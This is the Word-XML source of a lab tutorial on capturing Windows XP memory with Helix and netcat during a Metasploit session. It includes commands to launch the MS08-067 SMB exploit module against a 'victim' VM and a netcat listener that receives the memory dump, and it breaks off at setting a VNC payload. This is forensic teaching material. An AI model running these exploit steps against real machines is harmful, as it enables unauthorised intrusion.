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411AAE" w14:textId="1955F024" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36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b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Helix: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="51A98BB5" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:p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 xml:space="preserve">Dump Window's Physical Memory During Metasploit Session  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70617A63" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:p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</w:p>
    <w:p w14:paraId="66A12DC9" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeas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eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Section 0. Background Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506661BE" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Helix3 is a Live CD built on top of Ubuntu. It focuses on incident response and computer forensics. According to Helix3 Support Forum, e-fense is no longer planning on updating the free version of Helix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C09B2E" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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See </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00645F40">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="vi-VN"/>
          </w:rPr>
          <w:t>http://www.e-fense.com/products.php</w:t>
        </w:r>
      </w:hyperlink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320DEF6E" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA71FE2" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="709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In this lab, we will use Metasploit from a BackTrack Server to exploit MS08-067 on a Windows XP SP2 box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357F188A" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:num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Then we will use Helix's Netcat to dump memory of the current session to a binary image on the same BackTrack Machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD2E23" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Subsequent Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3FE3E9" w14:textId="10184D70" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="1276"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="709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FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Analyzing A Metasploit Memory Capture from Windows XP SP2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D172A66" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:p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0CC27335" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeas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eastAsia="vi-VN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00645F40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eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Section 1. Start Up BackTrack Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA7E2A" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Booting up BackTrack5R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556D6CA" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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4F7AF2CD" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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Start up VMware Player</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC18022" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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BackTrack5R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D7424" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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Play Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D501D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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Note</w:t>
      </w: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03372382" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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For those of you that are not part of my class, this can be any BackTrack or Ubuntu machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559E3D3" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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It needs to have the Volatility 2.0 Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14861F4D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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If you do not have the Volatility 2.0 Framework please complete this lab.  (</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00645F40">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="vi-VN"/>
          </w:rPr>
          <w:t>Click Here</w:t>
        </w:r>
      </w:hyperlink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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B8AEF" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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3ED45AAD" wp14:editId="73A779F5">
            <wp:extent cx="4742952" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="28" name="Picture 28" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.1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850" cy="405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DFB58" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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23603703" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Start up a terminal window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B31FA" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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3D290D07" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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the Terminal Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE58AC6" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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7AFEA768" wp14:editId="16694748">
            <wp:extent cx="4775393" cy="3876675"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="27" name="Picture 27" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.1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754" cy="388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9C7D8" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Obtain the IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29444AF7" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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3BFCA0A1" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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ifconfig -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AB0220" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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Notes</w:t>
      </w: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6C7D63F5" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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This will be the machine that the Victim's Memory Image will be sent to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2170A225" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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5FE04A6E" wp14:editId="3A943D6C">
            <wp:extent cx="4762500" cy="3776632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Picture 26" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.1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078" cy="378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92DE5" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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70329CD4" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Start Up Netcat on BackTrack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B76DEB" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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7800C8C7" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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mkdir -p /var/forensics/images/WV01_MS08067_VNC/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51237686" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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cd /var/forensics/images/WV01_MS08067_VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886D2D0" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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nc -l -vvv -p 8888 &gt; WV01_VNC.dd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47525120" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7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Netcat will listen for Helix to send the Memory Image from the Victim Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF111E" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7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Continue to next step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340733B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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64051B71" wp14:editId="32FABBA2">
            <wp:extent cx="4790955" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Picture 25" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.2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136" cy="337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17547" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:p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594CEC46" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeas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eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Section 2. Start Up Windows Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77111E35" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Booting up WindowsVulerable01 (Victim Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0BCDB" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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0B1A0317" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D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Start up VMware Player</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF5418C" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D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WindowsVulerable01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0A0E6" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D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Play Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A89A04D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Note</w:t>
      </w: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5CD7707B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="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WindowsVulerable01 is a Windows XP machine running SP2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002F59A" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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57FCF9CF" wp14:editId="1F0870BD">
            <wp:extent cx="4830445" cy="3800475"/>
            <wp:effectExtent l="0" t="0" r="8255" b="9525"/>
            <wp:docPr id="24" name="Picture 24" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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179" cy="3802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4E366" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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WindowsVulerable01 Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E47A5A" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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56368E4F" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Login as administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE4EB6" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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21D9C3C6" wp14:editId="3A3856DA">
            <wp:extent cx="4810125" cy="3868015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 23" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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8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E3FB6" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:p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0B7EE750" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeas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eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Section 3. Start Up Notepad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7C9266" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Start Up NotePad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C091E95" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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74E71790" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Start --&gt; All Programs --&gt; Accessories --&gt; Notepad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FDC8E" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Notes</w:t>
      </w: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243D2D7F" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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 started up Notepad as a reference point before the Metasploit was started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0728EB" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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1E68AD75" wp14:editId="30D32730">
            <wp:extent cx="4771390" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture 22" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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425" cy="371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999A8" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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6E48BD83" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Start Up Command Prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B319D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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17CB4AF3" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D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Start --&gt; All Programs --&gt; Accessories --&gt; Command Prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0709F1" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D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ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42154F32" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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This is the victim IP Address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C19B0" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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In my case, it is 192.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C25DB1" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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2F93336E" wp14:editId="3D28D861">
            <wp:extent cx="4785360" cy="3886200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture 21" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.2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560" cy="3887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1003B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeas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eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Section 4. Engage Metasploit MS08-067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2A25D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Start the Metasploit msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDB95D7" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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2F101A98" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Applications --&gt; BackTrack --&gt; Exploitation Tools --&gt; Network Exploitation Tools --&gt; Metasploit Framework --&gt; msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9099F" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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6301DDC6" wp14:editId="59A5DB48">
            <wp:extent cx="4829175" cy="3837195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture 20" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.2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029" cy="384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2C86A" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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0EDF786E" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Search and Use MS08-067 Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BD96C" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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7D70C651" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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search ms08_067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A751991" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2962D187" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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4ADA37A4" wp14:editId="30956A4B">
            <wp:extent cx="4772025" cy="3806982"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="19" name="Picture 19" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.2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83" cy="380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CF990" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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3FCEFB21" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Set VNC Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0284F776" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
